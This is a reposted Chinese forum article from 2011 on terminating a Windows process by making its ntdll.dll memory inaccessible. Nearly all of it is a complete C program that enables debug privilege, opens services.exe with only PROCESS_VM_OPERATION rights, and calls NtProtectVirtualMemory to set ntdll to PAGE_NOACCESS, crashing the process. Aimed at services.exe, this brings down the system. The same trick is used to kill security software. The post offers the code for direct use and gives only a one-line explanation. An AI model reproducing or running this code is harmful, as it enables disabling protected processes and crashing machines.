码迷,mamicode.com
首页 > 系统相关 > 详细

【转】利用NtProtectVirtualMemory结束进程

时间:2015-01-07 12:59:44      阅读:242      评论:0      收藏:0      [点我收藏+]

标签:

标 题 : 【原创】利用NtProtectVirtualMemory结束进程
作 者 : KiDebug
时 间 : 2011 - 07 - 13, 09 : 37 : 08
链 接 : http ://bbs.pediy.com/showthread.php?t=137067
 
原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
/*
* 【作者:KiDebug】
* 【空间:http://hi.baidu.com/KiDebug/】
*  VC 6.0编译出错请百度:“vc 6.0 unicode”
*/
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
 
#pragma comment(lib,"Psapi.lib")
 
typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(
ULONG Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;
 
typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __inout PSIZE_T RegionSize,
    __in ULONG NewProtectWin32,
    __out PULONG OldProtect
    );
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
 
ULONG GetPID(WCHAR* proc)
{
    BOOL                working = 0;
    PROCESSENTRY32      lppe = { 0 };
    ULONG               targetPid = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 
    if (hSnapshot)
    {
        lppe.dwSize = sizeof(lppe);
        working = Process32First(hSnapshot, &lppe);
        while (working)
        {
            if (_wcsicmp(lppe.szExeFile, proc) == 0)
            {
                targetPid = lppe.th32ProcessID;
                break;
            }
            working = Process32Next(hSnapshot, &lppe);
        }
    }
 
    CloseHandle(hSnapshot);
    return targetPid;
}
 
 
void main()
{
    HMODULE     ntdll;
    MODULEINFO  ModuleInfo;
    ntdll = GetModuleHandle(L"ntdll.dll");
    if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO)))
    {
        return;
    }
 
    BOOLEAN         Enabled;
    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    if (RtlAdjustPrivilege == NULL)
    {
        return;
    }
 
    RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);
 
 
    HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe"));
    if (hProc == NULL)
    {
        return;
    }
 
    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (NtProtectVirtualMemory == NULL)
    {
        return;
    }
 
    ULONG   OldProtect;
    NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect);
}

 

【转】利用NtProtectVirtualMemory结束进程

标签:

原文地址:http://www.cnblogs.com/Lthis/p/4207966.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!